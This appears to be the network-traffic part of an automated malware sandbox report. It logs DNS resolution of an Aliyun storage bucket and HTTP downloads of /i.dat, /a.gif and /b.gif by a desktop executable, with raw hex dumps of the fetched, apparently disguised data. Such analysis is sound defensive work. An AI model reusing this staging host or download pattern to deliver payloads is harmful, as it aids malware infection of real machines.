                                Jan 7, 2025 04:15:41.635700941 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.635716915 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.635812998 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.635893106 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.635943890 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.635992050 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.636060953 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.636116028 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.636156082 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.636205912 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.636565924 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.636629105 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.636724949 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.636778116 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.637130976 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.637177944 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.637190104 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.637201071 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.637228012 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.637243986 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.637391090 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.637442112 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.637480021 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.637541056 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.637790918 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.637823105 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.637852907 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.637860060 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.637871981 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.637900114 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.638025999 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.638077021 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.638108015 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.638158083 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.638232946 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.638284922 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.638377905 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.638427019 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.638571024 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.638619900 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.638699055 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.638742924 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.768975019 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.768989086 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.769011974 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.769021034 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.769083023 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.769099951 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.769109011 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.769123077 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.769140959 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.769201994 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.769212008 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.769254923 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.769283056 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.769316912 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.806282043 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.806358099 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.806387901 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.806437969 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.806482077 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.806526899 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.806535006 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.806586981 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.806729078 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.806782961 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.806782961 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.806797028 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.806828022 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.806838989 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.806962013 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.807003021 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.807087898 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.807141066 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.807270050 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.807311058 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.807445049 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.807492971 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.807715893 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.807800055 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.807858944 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.807909966 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.808193922 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.808243990 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.808254004 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.808303118 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.808454037 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.808499098 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.808540106 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.808588028 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.809123993 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.809153080 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.809181929 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.809189081 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.809201002 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.809232950 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.809313059 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.809357882 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.809365988 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.809371948 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.809403896 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.809413910 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.809792995 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.809845924 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.809962988 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.810017109 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.810070038 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.810123920 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.810237885 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.810277939 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.810291052 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.810297966 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.810324907 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.810340881 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.810400963 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.810453892 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.810661077 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.810714006 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.810761929 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.810813904 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.810936928 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.810986042 CET49712443192.168.2.839.103.20.48
UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 7, 2025 04:15:30.283509970 CET | 53903 | 53 | 192.168.2.8 | 1.1.1.1
Jan 7, 2025 04:15:31.088064909 CET | 53 | 53903 | 1.1.1.1 | 192.168.2.8

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 7, 2025 04:15:30.283509970 CET | 192.168.2.8 | 1.1.1.1 | 0xff94 | Standard query (0) | jylhok.oss-cn-beijing.aliyuncs.com | A (IP address) | IN (0x0001) | false

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 7, 2025 04:15:31.088064909 CET | 1.1.1.1 | 192.168.2.8 | 0xff94 | No error (0) | jylhok.oss-cn-beijing.aliyuncs.com | sc-2a1c.cn-beijing.oss-adns.aliyuncs.com | (none) | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 04:15:31.088064909 CET | 1.1.1.1 | 192.168.2.8 | 0xff94 | No error (0) | sc-2a1c.cn-beijing.oss-adns.aliyuncs.com | sc-2a1c.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com | (none) | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 04:15:31.088064909 CET | 1.1.1.1 | 192.168.2.8 | 0xff94 | No error (0) | sc-2a1c.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com | (none) | 39.103.20.48 | A (IP address) | IN (0x0001) | false

• jylhok.oss-cn-beijing.aliyuncs.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49708 | 39.103.20.48 | 443 | 7668 | C:\Users\user\Desktop\287438657364-7643738421.08.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 03:15:32 UTC | 111 | OUT | GET /i.dat HTTP/1.1
User-Agent: GetData
Host: jylhok.oss-cn-beijing.aliyuncs.com
Cache-Control: no-cache
2025-01-07 03:15:32 UTC | 557 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Tue, 07 Jan 2025 03:15:32 GMT
Content-Type: application/octet-stream
Content-Length: 512
Connection: close
x-oss-request-id: 677C9C5434D7B33034829C2B
Accept-Ranges: bytes
ETag: "6FE90B6ABE6C4D1079B730F10120B3D1"
Last-Modified: Mon, 06 Jan 2025 09:25:58 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 6796293658323038043
x-oss-storage-class: Standard
x-oss-ec: 0048-00000113
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: b+kLar5sTRB5tzDxASCz0Q==
x-oss-server-time: 2
2025-01-07 03:15:32 UTC | 512 | IN | Data Raw: [512-byte binary response body for /i.dat; hex and ASCII dump omitted]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49709 | 39.103.20.48 | 443 | 7668 | C:\Users\user\Desktop\287438657364-7643738421.08.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 03:15:34 UTC | 111 | OUT | GET /a.gif HTTP/1.1
User-Agent: GetData
Host: jylhok.oss-cn-beijing.aliyuncs.com
Cache-Control: no-cache
2025-01-07 03:15:34 UTC | 546 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Tue, 07 Jan 2025 03:15:34 GMT
Content-Type: image/gif
Content-Length: 135589
Connection: close
x-oss-request-id: 677C9C561F7AD933366386E7
Accept-Ranges: bytes
ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
Last-Modified: Mon, 06 Jan 2025 08:35:20 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 8642451798640735006
x-oss-storage-class: Standard
x-oss-ec: 0048-00000104
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
x-oss-server-time: 14
2025-01-07 03:15:34 UTC | 3550 | IN | Data Raw: [first chunk of the /a.gif response body; it begins with the PNG file signature and an IHDR chunk rather than GIF data, despite the Content-Type of image/gif; hex and ASCII dump omitted]
2025-01-07 03:15:34 UTC | 4096 | IN | Data Raw: [continuation of the /a.gif response body; hex and ASCII dump omitted]
2025-01-07 03:15:34 UTC | 4096 | IN | Data Raw: [continuation of the /a.gif response body; hex and ASCII dump omitted]
2025-01-07 03:15:34 UTC | 4096 | IN | Data Raw: [continuation of the /a.gif response body; hex and ASCII dump omitted]
2025-01-07 03:15:34 UTC | 4096 | IN | Data Raw: [continuation of the /a.gif response body; hex and ASCII dump omitted]
2025-01-07 03:15:34 UTC | 4096 | IN | Data Raw: [continuation of the /a.gif response body; hex and ASCII dump omitted]
2025-01-07 03:15:34 UTC | 4096 | IN | Data Raw: [continuation of the /a.gif response body; hex and ASCII dump omitted]
2025-01-07 03:15:34 UTC | 4096 | IN | Data Raw: [continuation of the /a.gif response body; hex and ASCII dump omitted]
                                2025-01-07 03:15:34 UTC4096INData Raw: 56 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2
                                Data Ascii: VZ~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJL
                                2025-01-07 03:15:34 UTC4096INData Raw: 65 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd
                                Data Ascii: eWUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                2 | 192.168.2.8 | 49710 | 39.103.20.48 | 443 | 7668 | C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2025-01-07 03:15:35 UTC | 111 | OUT | GET /b.gif HTTP/1.1
                                User-Agent: GetData
                                Host: jylhok.oss-cn-beijing.aliyuncs.com
                                Cache-Control: no-cache
                                2025-01-07 03:15:36 UTC | 547 | IN | HTTP/1.1 200 OK
                                Server: AliyunOSS
                                Date: Tue, 07 Jan 2025 03:15:36 GMT
                                Content-Type: image/gif
                                Content-Length: 125333
                                Connection: close
                                x-oss-request-id: 677C9C582A05773233776008
                                Accept-Ranges: bytes
                                ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                Last-Modified: Mon, 06 Jan 2025 08:35:20 GMT
                                x-oss-object-type: Normal
                                x-oss-hash-crc64ecma: 10333201072197591521
                                x-oss-storage-class: Standard
                                x-oss-ec: 0048-00000104
                                Content-Disposition: attachment
                                x-oss-force-download: true
                                Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                x-oss-server-time: 11
                                2025-01-07 03:15:36 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                2025-01-07 03:15:36 UTC4096INData Raw: 5e 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19
                                Data Ascii: ^_X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
                                2025-01-07 03:15:36 UTC4096INData Raw: 6d 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0
                                Data Ascii: mmkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
                                2025-01-07 03:15:36 UTC4096INData Raw: c2 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9
                                Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                                2025-01-07 03:15:36 UTC4096INData Raw: 19 d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7
                                Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                                2025-01-07 03:15:36 UTC4096INData Raw: de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4
                                Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                                2025-01-07 03:15:36 UTC4096INData Raw: 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2
                                Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
